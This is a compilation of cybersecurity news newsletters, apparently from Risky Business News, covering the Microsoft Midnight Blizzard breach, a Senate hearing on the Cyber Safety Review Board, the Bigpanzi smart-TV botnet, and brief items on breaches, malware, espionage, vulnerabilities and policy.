In a blog post, Microsoft said the group breached its network after conducting a password spray attack on a non-production test tenant account and then pivoted to its corporate email accounts system.
According to an SEC filing, the threat actor initially searched and stole information about what Microsoft knew of Midnight Blizzard's activities.
Image: Joe Slowik
Microsoft's disclosure language does not specifically state that this was the only stolen information, but it is worth pointing out that Microsoft is currently hosting the Ukrainian government's entire network on its Azure cloud infrastructure.
The breach has drawn quite an avalanche of criticism and ridicule for Microsoft for various and well-deserved reasons.
First, Microsoft disclosed the breach late on a Friday night— a well-known scummy tactic to hide the incident from extended media coverage.
Second, the breach took place weeks after Microsoft announced, with bells and whistles, its new Secure Future Initiative, a new plan to re-focus the company's engineering efforts to improve the security of its own products. The new initiative was meant to mimic a similar pledge made by Bill Gates in 2002—named Trustworthy Computing—that led to significant changes to Microsoft's security posture and the creation of what we now know as Patch Tuesday.
Third, the new breach took place four months after Microsoft disclosed another state-sponsored hack, this one by China's Storm-0558, which also had access to its internal network.
Fourth, after promoting MFA as the next evolution of online account security, the fact that one of its test accounts got popped via a password spray suggests Microsoft wasn't high on its own supply.
The hack is quite bad, but not for most of you reading this email. It may not have a material impact on day-to-day Microsoft users, but it has quite the reputational damage on Microsoft's position in the cybersecurity market.
Having Russian intelligence services breach your cybersecurity team's email accounts to steal data about themselves four months after the Chinese breached your production systems to steal US government emails is not what this industry calls trustworthy.
At what point, or after which hack, will the US government stop to re-evaluate its giant dependency on Microsoft infrastructure—something that's rubbing a lot of people the wrong way lately.
Breaches, hacks, and security incidents
HHS hack: A threat actor stole $7.5 million from the US Department of Health and Human Services in a security breach that took place between March and mid-November of last year. The attackers are believed to have gained access to an HHS system that processes civilian grant payments using spear-phishing. They then proceeded to hijack payments for five grant recipients before being detected. The investigation to identify the perpetrators is still underway. [Additional coverage in Bloomberg]
Ivanti attacks on federal networks: CISA is investigating potential breaches at US government agencies that could have been carried out through vulnerabilities in Ivanti Connect Secure VPN appliances. The vulnerabilities were disclosed on January 10 by US cybersecurity firm Volexity, which said the bugs were being exploited in the wild by Chinese state-sponsored hackers. Attacks targeting Ivanti products entered a phase of mass exploitation immediately after Volexity's disclosure. CISA issued an emergency directive instructing federal agencies to patch the Ivanti bugs as soon as possible. A CISA spokesperson told reporters that roughly 15 US government agencies were using Ivanti products before the attacks. [Additional coverage in Axios]
GVSU hack: A Ukrainian hacker group named BlackJack has breached and wiped more than 150 systems belonging to the Main Military Construction Directorate for Special Facilities (GVSU), a state-owned company that builds military facilities for the Russian military. The group claims it also downloaded more than 1.2TB of information from the company's servers containing information on more than 500 military objectives. The BlackJack group has been informally linked to the Security Service of Ukraine. Ukraine's Main Directorate of Intelligence, or GUR, praised the attack on Telegram as a major success. [Additional coverage in UkrInform/English coverage in BusinessInsider]
KSU ransomware attack: Kansas State University is dealing with a ransomware attack that impacted some of its IT networks, such as email servers, WiFi networks, and VPN systems.
VF Corp ransomware attack: The personal data of more than 35.5 million customers was stolen in a ransomware attack in December 2023, VF Corp confirmed in an SEC filing. The company operates more than 13 retail brands across the world, such as The North Face, Dickies, Vans, Timberland, and Supreme. The AlphV ransomware group took credit for the attack days before the gang's infrastructure was seized by US law enforcement.
SK data breach: Hackers breached South Korea's National Council of Social Welfare and stole the personal data of more than 1.35 million volunteer workers. [Additional coverage in KBS]
Lockbit claims go wild: The Lockbit ransomware gang took credit for breaching two giant companies—Swift Air and Subway. None of the intrusions have been verified, but it may be worth keeping an eye on the two claims, especially since Swift Air has filed for bankruptcy and will most likely not be in a position to pay.
Healthcare breaches in 2023: More than 115 million US patient records were exposed or stolen through data breaches in 2023, according to Fortified, a healthcare industry cybersecurity provider. The figure is almost double the 2022 numbers when almost 60 million patient records were exposed online. The number of healthcare breaches went down in 2023, suggesting larger providers were hit last year than the year before. In total, Fortified says that more than 489 million patient records were compromised in data breaches across the US over the last decade.
General tech and privacy
Google News failings: Google News is failing to remove AI-written articles copied from legitimate outlets, an investigation has discovered. Questioned on the matter, Google says it doesn't care if the articles are AI or human-written. [Additional coverage in 404 Media]
Firefox sabotage: Mozilla has accused the three major browser makers—Apple, Google, and Microsoft—of sabotaging Firefox. The company says it launched a new issue tracker where we intend to document the ways in which platforms put Firefox at a disadvantage.
Brave removes strict fingerprinting protection: The Brave team has removed its strict anti-fingerprinting protection from its web browser. The team argued the feature is hardly used and is known to cause websites to function incorrectly.
Government, politics, and policy
FTC bans another data broker: The US Federal Trade Commission has banned a US data broker from trading the precise location of American citizens. InMarket Media becomes the second US data broker to receive a ban of this kind. The FTC previously banned data aggregator Outlogic (formerly X-Mode Social) a week before.
CNMF anniversary: Cyber Command's CNMF ( Cyber National Mission Force) has recently celebrated its ten-year anniversary.
CISA pre-ransomware alerts: CISA has sent more than 1,200 notifications to US and international organizations in 2023 about early-stage ransomware activity on their networks. The agency has also sent 1,700 notifications to organizations that had systems vulnerable to common ransomware entry vectors. The two types of notifications were part of a pilot program CISA started in January 2023 to warn organizations of potential ransomware attacks. [Additional coverage in CISA's 2023 Year in Review report]
NCSC Cyber League: The UK NCSC has launched a new project named Cyber League that aims to bring together experts from the NCSC and the private sector to work on the biggest cyber threats facing the UK. The program is modeled after Industry 100 but is open to cybersecurity experts working at smaller companies.
WEF cybersecurity outlook: The World Economic Forum has published a report looking at recent cybersecurity trends and the cybersecurity posture of the world's nations. Some of the main conclusions are below.
Alignment between cyber and business is becoming more common.
The cyber-skills and talent shortage continues to widen at an alarming rate.
Cyber ecosystem risk is becoming more problematic.
There is growing cyber inequity between organizations that are cyber-resilient and those that are not.
Emerging technology will exacerbate long-standing challenges related to cyber resilience.
Sponsor section
In this Risky Business News sponsor interview, Tom Uren talks to Ivan Dwyer of Material Security about how it makes sense to view office productivity suites as an organisation's critical infrastructure.
Cybercrime and threat intel
Pompompurin sentenced: The former administrator of BreachForums has been sentenced to time served and 20 years of supervised release. Known online as Pompompurin, Brian Connor Fitzpatrick will serve the first two years in home arrest with GPS location monitoring and will have to submit to periodic polygraph tests. Fitzpatrick will also have to register as a sex offender after pleading guilty to possession of child pornography materials. The 21-year-old was initially arrested in March 2023, was set free on parole in July, and re-arrested in early 2024 after breaking parole conditions by using a VPN and the internet. The judge's sentence was a major surprise after the prosecution sought a minimum 15-year-old prison sentence. [Additional coverage in DataBreaches.net]
Flint24 charged in the US: US authorities have indicted a Russian national named Aleksey Stroganov for harvesting and selling hundreds of millions of banking and credit card details. Stroganov was known under the hacker name Flint24, and he was part of a cybercrime syndicate that operated tens of underground carding shops. He was detained by the FSB in 2020 after his group sold the data of Russian citizens. His trial is still underway in Russia. One of Stroganov's accomplices—Tim "Key" Stigal—was also indicted in the US as well.
Pegasus research stands in court: A Mexican judge has allowed CitizenLab's research on the Pegasus spyware to stand in court as evidence [PDF]. The judgment comes after the organization's findings were recently contested by an army of no-name researchers and bot networks in support of oppressive regimes.
Ransomware via TeamViewer: Huntress researchers say they've seen several incidents where threat actors broke into corporate networks via TeamViewer connections and deployed ransomware.
Slug ransomware gang: A new ransomware gang has been spotted in the wild. Named Slug, the gang operates a dark web leak site. The gang's site is currentl listing only one victim.
New npm malware: Twenty-eight malicious npm packages were discovered last week. Check out GitHub's security advisory portal for more details. One of them was this package, delivering a RAT on Windows systems.
Walmart fraud: ProPublica has a deep dive into how cybercriminals are abusing Walmart's financial services for fraud, scams, and money laundering—all while Walmart "has resisted taking responsibility while breaking promises to regulators and skimping on training."
2023 internet exploitation: GreyNoise has published its year-in-review report covering internet mass-exploitation trends for 2023.
Telegram crypto-scams: Roughly 40% of posts in Telegram channels dedicated to cryptocurrency were found to be fraudulent, according to a report from Russian security firm Angara Security.
Crypto-crime in 2023: Cryptocurrency transactions linked to illicit activity accounted for $24.2 billion in 2023, down from the $29.6 billion all-time peak of 2022. The 2023 figure represents 0.34% of all cryptocurrency currently in circulation. Ransomware had a record year in 2023, but Chainalysis has not released an exact number. Ransomware payments accounted for $456.8 million the year before, in 2022. [More stats in the Chainalysis' yearly report]
Malware technical reports
New macOS malware: Jamf has discovered a new macOS malware strain hidden inside pirated macOS applications offered online. Researchers haven't named the malware, but they said it's similar to the old ZuRu malware from 2021, as spotted back then by Objective-See and Trend Micro.
DarkGate: Splunk's security team has published a report on DarkGate, one of today's most popular MaaS portals and malware loaders. S2W Talon also recently published a report on the same malware.
Zloader returns: The Zloader (Terdot, DELoader, Silent Night) malware botnet has returned to life after surviving a takedown attempt in April 2022. Security firm Zscaler says it has seen new versions of the malware in September 2023, 14 months after Microsoft and other security vendors seized its old servers. The new Zloader versions include better encryption and a better DGA for its command-and-control servers.
Parrot TDS: Palo Alto Networks looks at Parrot TDS, a botnet that redistributes traffic from hacked sites to malware operations. The botnet has been active since October 2021, and most of its infected sites run a CMS like Joomla, WordPress, or others.
ThreeAM (3AM) ransomware: French cybersecurity firm Intrinsec has linked the new ThreeAM (3AM) ransomware operation to the Royal ransomware, an offshoot of the old Conti gang.
"We assess with a low to medium confidence that, although ThreeAM intrusion sets seem to be a less sophisticated subgroup of Royal, displaying lesser operational security, it could make an impact with a high rate of attacks."
Sponsor Section
A deep dive into what's new with Material Security's Phishing Protection product: New detections, response UX boosters, and more actionable reports.
APTs, cyber-espionage, and info-ops
UNC3886: Google's Mandiant division says that a VMWare vulnerability patched in October of last year was secretly exploited in the wild by Chinese hackers since late 2021. Mandiant linked the attacks to a group it tracks as UNC3886. The group has a long history of going after devices that cannot run EDR security products, allowing their attacks to go undetected for longer. When it patched the vulnerability (CVE-2023-34048) in October, VMWare wasn't aware of active exploitation but released patches even for end-of-life devices.
Vulnerabilities, security research, and bug bounty
German software engineer fined: A German court has fined a software developer €3,000 for using hardcoded credentials he found in a software's source code to access the vendor's database. The developer reported the hardcoded credentials to the vendor and the fact that the database was leaking details on 700,000 of its customers. Instead of thanking the developer, the vendor filed a complaint with the police. A German judge ruled that even if the credentials were exposed in cleartext, the developer was in the wrong for using them. [German coverage in WordFilter/English summary here]
MiraclePtr: Google says the MiraclePtr security feature that the company added to Chrome has mitigated 57% of use-after-free vulnerabilities in the browser's privileged processes, 7% over the 50% estimate its engineers were anticipating in 2022 when they first developed the technology.
Ivanti zero-days update: Security researchers from Assetnote have found new ways to exploit the recent Ivanti zero-days (CVE-2023-46805 & CVE-2024-21887) on older versions of the Connect Secure firmware. According to GreyNoise, exploitation of these zero-days has extended from a Chinese APT to cryptomining botnets. According to Volexity, there are now more than 2,100 compromised hosts.
Chrome bug: Exodus has published a technical write-up on CVE-2024-0517, an out-of-bounds write code execution in Chrome's V8 engine that was patched last week.
Jinja2 vulnerability: There's a major Jinja2 vulnerability that's said to impact thousands of Python projects. Tracked as CVE-2024-22195, the vulnerability is an XSS bug. Since Jinja2 is a template engine, you'll find this one all over the place and in all sorts of flavors.
Infosec industry
New tool—BlueTuxedo: Software engineer Jake Hildreth has released BlueTuxedo, a tool to find and fix misconfigurations in Active Directory-integrated DNS. Last year, Hildreth also released Locksmith, a tool to detect and fix common misconfigurations in Active Directory Certificate Services.
New tool—LogBoost: Varonis security researcher Joseph Avanzato has released LogBoost, a tool designed to help DFIR operators parse and enrich logs.
New tool—Pulse-Meter: Security researcher Rich Warren has released Pulse-Meter, a tool to parse Ivanti Connect Secure system snapshots for new IOCs related to the exploitation of the CVE-2023-46805 and CVE-2024-21887 zero-days.
Tool update—TweetFeed: After going down for several months, the TweetFeed website is back. The site collects IOCs shared on Twitter.
Risky Business Podcasts
In this edition of Between Two Nerds, Tom Uren and The Grugq talk about how Stuxnet was an 'inevitability gamechanger,' how much we now know about the operation, and how much the Dutch government should have known at the time.
This newsletter is brought to you by Panther, the scalable detection-as-code based SIEM. You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Apple Podcasts:
Following a hearing of the Senate Homeland Security and Governmental Affairs Committee, US lawmakers said they're considering legislation that would make the DHS Cyber Safety Review Board (CSRB) a permanent organization in the US cybersecurity space.
Established in May 2021 through a White House executive order, the CSRB was set up as an analog to the TSA's National Transportation Safety Board (NTSB).
It was established in the aftermath of the SolarWinds supply chain attack as an independent board tasked with investigating cybersecurity-related incidents that affect the US government and issuing recommendations to improve security measures across both the US public and private sectors.
Three cybersecurity experts invited to testify at the hearing argued that while the CSRB was a step in the right direction, the Board was somewhat ineffective, and its reports were superficial.
Some blamed the Board's current problems on the CSRB's lack of subpoena powers, which meant that the CSRB would often have to put reports together using legally sanitized statements rather than raw incident response data.
No subpoena powers also means the Board can't force companies and individuals to cooperate and (still) needs to lean on its subjects' goodwill and cooperation to get the answers it desires.
"I think that the big challenge that we have with a lack of subpoena power on the current Board is that the real answers are often found about three layers deeper than the information that, as far as I'm aware now, is being provided to the Board," Tarah Wheeler, CEO at Red Queen Dynamics, told the HSGAC.
John Miller, Senior Vice President of Policy, Trust, Data, and Technology and General Counsel at the Information, was the only one among the three to oppose the idea of giving the Board subpoena powers.
"I think that it's premature to say that a board focused on investigating incidents needs subpoena power to get information until we know what those regulations say and what information is already going to be mandatorily required to be provided to CISA and the government. I think that the other factors that I would keep in mind are, one, CISA has long had a partnership mission and collaborative mission with the IT sector and all critical infrastructure sectors in areas such as information sharing and otherwise. We are concerned subpoena authority puts CISA, particularly, if that's where the CSRB continues to live, in a more adversarial position with the private sector."
Miller also brought up the other current major issues with the CSRB, which he says lacks the transparency and independence of the much more successful NTSB, a topic also brought up by Trey Herr, Director Cyber Statecraft Initiative at the Atlantic Council.
The two argued that the procedures around how CISA decides what the CSRB investigates are still unclear. While the Log4j and Lapsus$ topics were important, the CSRB has often skipped on looking at incidents with a broader impact on national security.
It took quite a lot of pressure from US Senators and the private sector to convince CISA to have the CSRB look at the recent Storm-0558 hack of Microsoft infrastructure from June 2023.
"The Board provides the potential for a long range lens. Not just a reactive moment, but potentially picking historical incidents that have far greater consequence for the design and operation of these systems than we understand in the moment," Herr said.
Wheeler also touched on the Board's membership, which she argued should be staffed with dedicated investigators rather than industry figureheads, especially those from the private sector, which may end up investigating competitors.
"Many individuals on the CSRB are beloved and respected, but they do have full-time jobs, and they do not have the time, freedom, and authority to conduct independent, thorough investigations."
Wheeler also asked lawmakers not to introduce classified information and require clearances to sit on the CSRB.
"Lack of transparency around how people are currently nominated to the CSRB and how the Board selects which investigations they pursue may decrease trust in its impartiality. In addition, forcing CSRB members to hold clearances would drastically limit the pool of potential investigators in the already massive deficit of US cyber security talent."
The HSGAC hearing was conducted at the request of the White House, which asked Congress to codify the CSRB as part of the US National Cybersecurity Strategy last year [PDF, page 16].
Breaches, hacks, and security incidents
DDoS attacks on Swiss sites: Switzerland's cybersecurity agency has confirmed that a wave of DDoS attacks has caused temporary outages of several government portals. Swiss officials have blamed the attack on NoName, a Russian-linked hacktivist group. The attacks coincided with Ukrainian President Zelenskyy's attendance at the World Economic Forum's annual meeting.
Kyivstar attack: Dutch telecommunications company Veon expects to lose around $95 million in the aftermath of Russia's cyberattack on Kyivstar, Ukraine's largest mobile operator. Veon says the figure represents lost revenue and loyalty measures Kyivstar had to pay out to customers following its prolonged outage. Hackers part of Russia's military intelligence unit breached Kyivstar on December 12 and wiped thousands of the telco's servers.
Socket crypto-heist: Cryptocurrency platform Socket temporarily halted operations of its Bungee trading platform after a threat actor stole $3.3 million in assets. The company believes the attacker exploited one of its wallets. Socket restarted Bungee after fixing the issue and said it was working on a compensation plan for affected users. [Additional coverage in CoinDesk]
GitHub rotates keys: Code hosting platform GitHub has rotated GPG keys used by its apps and API to sign code commits and submit secrets. The company rotated the keys after receiving a bug report about a vulnerability that could have allowed threat actors to gain access to the signing keys. GitHub says it did not find evidence that the bug was exploited prior to getting patched.
Naz.API leak: A threat actor has leaked more than 104GB of infostealer logs and credential-stuffing lists. According to security researcher Troy Hunt, the data contains more than 71 million unique email addresses and 100 million unique passwords. Named Naz.API, the leaked data was added to Hunt's Have I Been Pwned database.
Image: Troy Hunt
General tech and privacy
Samsung S24 to get 7 years of updates: Samsung has launched its new line of S24 smartphones, and the company has committed to providing seven years of software and security updates. Previously, the company's smartphones were only supported for five years. Samsung joins Google to be the only vendor to provide seven years of security updates for its Android smartphones.
Chrome Incognito Mode update: Google is changing the text that appears in Chrome's Incognito Mode browser mode. The change comes after the company settled a 2020 lawsuit for tracking users while in Incognito Mode. The new text informs users that their activity will be tracked by the company.
"Others who use this device won't see your activity, so you can browse more privately. This won't change how data is collected by websites you visit and the services they use, including Google. Downloads, bookmarks, and reading list items will be saved. Learn more"
YouTube making millions of climate disinformation: A new study has found that YouTube is making millions of dollars a year from running ads on climate change disinformation videos. The study also found a new trend in climate change disinformation, where instead of negating that climate change happens, videos claim that clean energy solutions don't work and that the world should embrace more fossil fuels. [Additional coverage in CBC]
Yahoo fined in France: French privacy watchdog CNIL has fined Yahoo's EMEA branch €10 million for failing to comply with the EU GDPR regulations. CNIL says Yahoo ignored user choices and continued to use tracking cookies for the users of its Yahoo Mail service. The agency says Yahoo also ignored users who withdrew their consent through the Yahoo Mail interface.
Facebook tracking: A Consumer Reports study found that users generally have their data collected and sent to Facebook's ad platform by roughly 2,230 companies, on average. Some users even had their data collected by more than 7,000 companies.
ACSC phone security guide: The Australian Cyber Security Center has published a guide on how business leaders can keep their devices secure. The guide comes with several recommendations, including the advice to turn devices on and off on a daily basis. A similar advice was shared by the makers of mobile operating system GrapheneOS a week earlier.
State of AI in the Cloud: Cloud security firm Wiz has published its State of AI in the Cloud 2024. According to Wiz, AI is rapidly gaining ground in cloud environments, with over 70% of organizations now using managed AI services.
Government, politics, and policy
FTC joins CAPE: The US Federal Trade Commission has joined Global Cooperation Arrangement for Privacy Enforcement (Global CAPE), an international organization that facilitates cooperation and assistance in privacy and data security investigations.
US warns of Chinese drones: CISA and the FBI have published a joint security advisory warning US companies and federal agencies against the use of Chinese drones. The two agencies describe Chinese drones as a national security threat and claim they could be used to collect and spy on US critical infrastructure sites. US officials cite recent Chinese laws that grant the government the power to coerce companies into helping its espionage efforts.
Election interference: The Chair of the US Senate Intel Committee has urged CISA to recommit to fighting foreign malign influence ahead of the upcoming 2024 US Presidential Elections. Sen. Mark Warner has cited a recently declassified intelligence report describing an uptick in disinformation efforts from US adversaries. Sen. Warner filed an amicus brief in support of CISA in its Supreme Court case, where several Republican states are trying to limit the agency's role in combating election disinformation.
Sponsor section
In this Risky Business News sponsor interview, Tom Uren talks to Ken Westin, Field CISO at Panther, about how the rise of cloud and hybrid IT architectures requires a new type of SIEM.
Cybercrime and threat intel
npm dead repos: A study from Aqua Security estimates that the real number of deprecated packages is around 21.2%, rather than the official 8.4%. The company is basing new figure on the practice of some developers who remove or archive their libraries when confronted with a security flaw, rather than fixing it.
Microsoft IR guide: Microsoft has published incident response guides for its Entra and 365 services.
"These guides contain the artifacts that Microsoft Incident Response hunts for and uses daily to provide our customers with evidence of Threat Actor activity in their tenant."
Water sector IR guide: CISA, the FBI, and the EPA have released an incident response guide for organizations in the water and wastewater management sector.
AI scams targeting Romania: Cyber Geeks has published a report detailing an online scam using AI-generated content targeting Romanians with investment opportunities in one of the country's main energy providers. The scam is abusing YouTube ads and has been going on since October of last year. Google has refused to take any action against it despite numerous reports from Romanian cybersecurity vendors and experts—including this reporter. The Romanian company whose brand is being abused has also warned customers not to fall victim to the scam.
TA866: Proofpoint has seen the return of TA866, a new financially motivated threat actor the company first saw last year.
Mimo: AhnLab researchers have published a profile on Mimo, a threat actor active since 2022. The group operates by using vulnerabilities to breach servers, where it installs cryptominers and proxyware. AhnLab says the group has recently also started installing ransomware (named Mimus) on hacked servers.
NoName057(16): Netscout researchers have published a profile on NoName057(16), a pro-Kremlin hacktivist group that's been recently involved in a long list of DDoS attacks against what they call "pro-Ukrainian organizations," may them be Western government or just random shoe stores.
Punchmade shop: A rapper named Punchmade Dev, known for singing about the cybercrime lifestyle, has apparently launched a card shop. Yes, I am just as shocked as you are. According to infosec reporter Brian Krebs, Punchmade is a young man named Devon Turner from Lexington, Kentucky. [Additional coverage in KrebsOnSecurity]
Malware technical reports
Monster Stealer: CyFirma researchers have published a report on Monster Stealer, a new infostealer advertised on Telegram by a Russian threat actor that gained popularity last year by releasing free infostealer logs on their channel.
Chae$ 4.1: Morphisec has published an analysis of Chae$ 4.1, the latest version of Chaes, a malware strain designed to infect Chrome browsers and exfiltrate data from users of Latin American online marketplaces since 2020.
macOS malware: SentinelOne looks at how three macOS infostealers (CherryPie, KeySteal, and Atomic InfoStealer) are evading XProtect signatures.
New botnet: Cado Security researchers have discovered a new botnet that infects Docker instances to deploy a cryptominer and 9Hits, an app that allows the attacker to monetize the hacked server's bandwidth.
Kuiper ransomware: Trellix researchers have published a breakdown of the Kuiper ransomware. According to Trellix, the ransomware has evolved quite a lot since its launch in September of last year. There are similar reports on this new ransomware strain from Stairwell and BishopFox as well.
Image: Trellix
Sponsor Section
A short demo on how to use Panther's Detections-as-Code (DaC) platform for cryptominer investigations.
APTs, cyber-espionage, and info-ops
Mint Sandstorm: Iranian APT group Mint Sandstorm is conducting spear-phishing campaigns aimed at compromising high-profile individuals working on Middle Eastern affairs at universities and research organizations in Europe and the US. Mint Sandstorm attempted to masquerade as known journalists seeking expert input on the Israel-Hamas war. According to Microsoft, the group tried to infect targets with a new, custom backdoor called MediaPl. The Mint Sandstorm overlaps with other Iranian threat actors tracked as APT35 and Charming Kitten and is linked to Iran's Islamic Revolutionary Guard Corps (IRGC) military intelligence service.
ColdRiver: Google's TAG security team has observed the ColdRiver APT group conducting new hacking operations targeting Western officials. The recent wave of attacks employed a new custom backdoor named Spica, a deviation from the group's typical account compromise and disinformation efforts. In early December 2023, the British government publicly linked the group to Center 18, a cybersecurity division inside Russia's FSB intelligence agency.
Vulnerabilities, security research, and bug bounty
Toyota network compromise: Security researcher Eaton Zveare broke into the network of a Toyota insurance broker through the company's premium rate calculator.
HVCI bypass: Software engineer Satoshi Tanda has published a technical write-up on CVE-2024-21305, a bypass of the Hypervisor-Protected Code Integrity (HVCI) security feature in Windows.
Outlook bug: Varonis researchers have published a write-up on CVE-2023-35636, a new way to steal NTLM hashes via Outlook.
TensorFlow bug: Praetorian researchers have identified a series of CI/CD misconfigurations that, when combined, can lead to compromise of TensorFlow releases. Google has fixed all issues.
RBI bypass: Security researchers at SpecterOps have devised a method to break and bypass Remote Browser Isolation (RBI), a security technology that isolates a user's browsing experience inside a remote cloud VM, lowering security risks.
Drupal security updates: The Drupal team has released a security update for the team's CMS that could allow attackers to crash sites via their comment fields.
Hidden Juniper bugs: According to watchTowr Labs, Juniper has secretly patched four vulnerabilities in JunOS without disclosing the bugs or filing for a CVE.
"Given this, it is interesting that Juniper did not find at least the missing authentication vulnerability to be severe enough to justify an out-of-cycle advisory, nor to register CVE or mention them in the release notes (although they did deem them important enough to request we delay our usual and industry-aligned 90-day VDP timeline)."
WhatsApp leak: ZenGo co-founder and CTO Tal Be'ery has disclosed a vulnerability that allows threat actors to determine how a user is using the WhatsApp instant messaging service. The bug allows attackers to determine how many devices a user has registered and if they are using the WhatsApp web interface. The attacker only needs a user's phone number, and the technique works even if the victim blocks the attacker's phone number. Be'ery disclosed his findings after Meta declined to patch the issue.
Infosec industry
New tool—Application Block: Malwarebytes has made its Application Block free as part of its ThreadDown offering.
New tool—LVE Repository: A group of academics and software engineers have released LVE Repository, a portal that documents and tracks vulnerabilities and exposures of large language models (LVEs).
New tool—Cybersecurity Incident Tracker: Security researcher Andrew Hoog has put together Cybersecurity Incident Tracker, a portal that tracks cybersecurity incidents reported via SEC 8K forms.
Industry moves: Email security company has appointed Marc van Zadelhoff as its new CEO. Former CEO Peter Bauer will remain a member of the Board.
Tianfu Cup 2023: Ant Group's Lightyear Lab has won the 2023 edition of the Tianfu Cup, China's most prestigious hacking contest. The competition took place in November 2023 after organizers canceled the contest's 2022 edition with no explanation. The cancellation came after several reports that bugs found during the 2021 edition were used in the wild by Chinese state-sponsored hackers days after the contest. Sixty-two teams participated in the 2023 edition, which featured new rules and a lot more Chinese products on the target list. Despite the change, the highest prices were still offered for Western products, while contest organizers shared very little information about what products were targeted or successfully hacked. [Additional coverage in Natto Thoughts]
Risky Business Podcasts
In this edition of Between Two Nerds, Tom Uren and The Grugq talk about how Stuxnet was an 'inevitability gamechanger,' how much we now know about the operation, and how much the Dutch government should have known at the time.
This newsletter is brought to you by Panther, the scalable detection-as-code based SIEM. You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Apple Podcasts:
A cybercrime operation is believed to have infected at least 172,000 smart TVs and set-top boxes with malware that carries out DDoS attacks.
Named Bigpanzi, the group has been active since at least 2015 and appears to target Spanish and Portuguese-speaking users across Latin America.
According to Chinese security firm QiAnXin, Bigpanzi built its botnet through social-engineering tactics, such as spreading apps to view pirated content, apps to enhance TV viewing experiences, and backdoored firmware updates.
Once installed, the apps and firmware updates would ensnare infected devices into the Bigpanzi botnet and carry out attacks at the operator's behest.
Image: QiAnXin
QiAnXin says Bigpanzi is the same group behind the Pandora botnet discovered by Russian security firm Dr.Web in September 2023.
While Chinese researchers say they tracked roughly 172,000 infected devices per week after they managed to hijack two of the botnet's command-and-control domains, they also estimate the Bigpanzi's real size to be in the realm of millions. They believe this because they only intercepted a small section of the botnet's C&C infrastructure and because of the ephemeral nature of smart TVs and set-top boxes, which are not always powered on and connected to Bigpanzi servers.
Researchers say that most of the botnet's infected devices are located in Brazil and are either Android-based smart TVs or TV set-top boxes that run on eCos, an open-source operating system for embedded devices.
Bigpanzi (Pandora) is the latest in a long list of modern-day botnets that specifically target smart TVs and set-top boxes, such as Ares, the Lemon Group, and BADBOX. The last two, and the most recent ones, primarily focus on ad fraud rather than DDoS attacks, which makes Bigpanzi somewhat stand out.
Breaches, hacks, and security incidents
Wise Lending crypto-heist: The Wise Lending DeFi platform has lost $464,000 worth of crypto-assets after an attacker exploited a vulnerability in its smart contract.
Fake Romanian DB leak: A post on the XSS hacking forum claiming to sell the data of more than 21 million Romanians has proven to be fake, according to Bit Sentinel's Andrei Avadanei.
Cloud provider returns stolen data: Cloud service provider Wasabi has returned stolen patient data that was stored on its servers to New York hospital chain North Star Health Alliance. The data had been stored on its servers by the Lockbit ransomware, which hacked the hospital in August 2023. North Star sued the ransomware group and obtained a court order to regain control over the gang's servers. [Additional coverage in HealthcareInfoSecurity]
General tech and privacy
ICO to look at AI scraping: The UK's privacy watchdog is looking at the legality of AI companies scraping web content to train generative models. The initiative will analyze if the practice breaks property or contract laws and its compliance with existing data protection laws.
Crypto firm shuts down after NY fine: Cryptocurrency trading platform Genesis Global shut down operations after receiving an $8 million fine in the US state of New York. Officials fined the company for failing to implement anti-money laundering and cybersecurity programs. The company shuttered its online website hours after receiving the fine. [Additional coverage in The Record]
Google to let EU users unlink services: Google will let European users unlink its services from one another. Some examples:
When Search, YouTube, and Chrome are not linked services, your recommendations in Search, like "What to watch" and your Discover feed will be less personalized.
When Search and Maps are not linked services, Reservations made on Search won’t appear in Google Maps.
Government, politics, and policy
Turkey secretly bans VPNs: The Turkish government has secretly ordered local internet service providers to block access to 16 VPN services. The block was enforced in December, and some of the blocked services include TunnelBear, Surfshark, and CyberGhost. Turkey has had strict control over its internet for years. Besides blocking access to pornographic sites, the country has also blocked access to news sites critical of the country's president, opposition websites, and pro-Kurdish content. The country joins China, Iran, and Russia in formally blocking VPN services. [Additional coverage in FT]
DOD Cyber Red Teams: The US Department of Defense has updated the rules and responsibilities for its cyber red teams [PDF].
UK-Ukraine security cooperation: The British and Ukrainian governments have signed a security cooperation agreement. The document covers both military and cyber matters.
Russia approves IoT protocol: The Russian Technical Regulation and Metrology Agency (Rosstandart) has approved the LoRaWAN protocol as the country's official Internet of Things (IoT) protocol. [Additional coverage in Cnews]
Telegram deanonymization: The Russian government claims it developed an AI system named Comrade Major (Товарищ майор) that can deanonymize the owners of Telegram channels. The system was developed by Russian software company T.Hunter and is expected to be formally launched this year or in 2025. Russian officials say they plan to use the new system for law enforcement. [Additional coverage in Izvestia]
Sponsor section
In this Risky Business News sponsor interview, Tom Uren talks to Ken Westin, Field CISO at Panther, about how the rise of cloud and hybrid IT architectures requires a new type of SIEM.
Cybercrime and threat intel
Tether is a favorite with scammers: The Tether (USDT) cryptocurrency has become the favorite money laundering medium used by pig-butchering groups, according to a recent report from the United Nations Office on Drugs and Crime (UNODC). The UN says the currency is widely used due to its widespread adoption and relatively easy access. Besides pig-butchering scams, Tether is also popular with task scam groups, a new type of scam where users are recruited to perform various online tasks in exchange for commissions. [Additional coverage in FT]
State of Software Supply Chain Security: ReversingLabs has published the 2024 State of Software Supply Chain Security Report, a document outlining major trends in software supply chain security from last year and how they may impact the current year's threat landscape.
A 400% annual increase in threats on the PyPI platform, with more than 7,000 instances of malicious PyPI packages discovered in the first three quarters of 2023. The vast majority of these were classified as "infostealers."
More than 40,000 instances of leaked or exposed development secrets across the major package managers (npm, PyPI, and RubyGems).
Instances of malicious npm packages in the first three quarters of 2023 decreased by 43% compared with malicious npm packages identified in all of 2022.
Npm accounted for 77%, or 31,000, of the more than 40,000 secrets detected across these four open-source platforms.
Rise in Telegram cryptominers: Russian security firm Dr.Web is seeing a rise in crypto-mining trojans hidden in pirated software spread via Telegram.
Inferno Drainer: Group-IB estimates that the operators of the Inferno Drainer phishing service stole more than $80 million worth of assets from victims. The service shut down in November.
SonicWall exposure: More than 178,000 SonicWall firewalls across the world are still unpatched and vulnerable to one of two major vulnerabilities disclosed ten months ago, in March 2023 (CVE-2022-22274 and CVE-2023-0656). The figure represents more than three-quarters of all internet-exposed SonicWall firewalls, according to a scan conducted by security firm BishopFox. Researchers warn that attacks could be imminent after proof-of-concept code is published online.
Malware technical reports
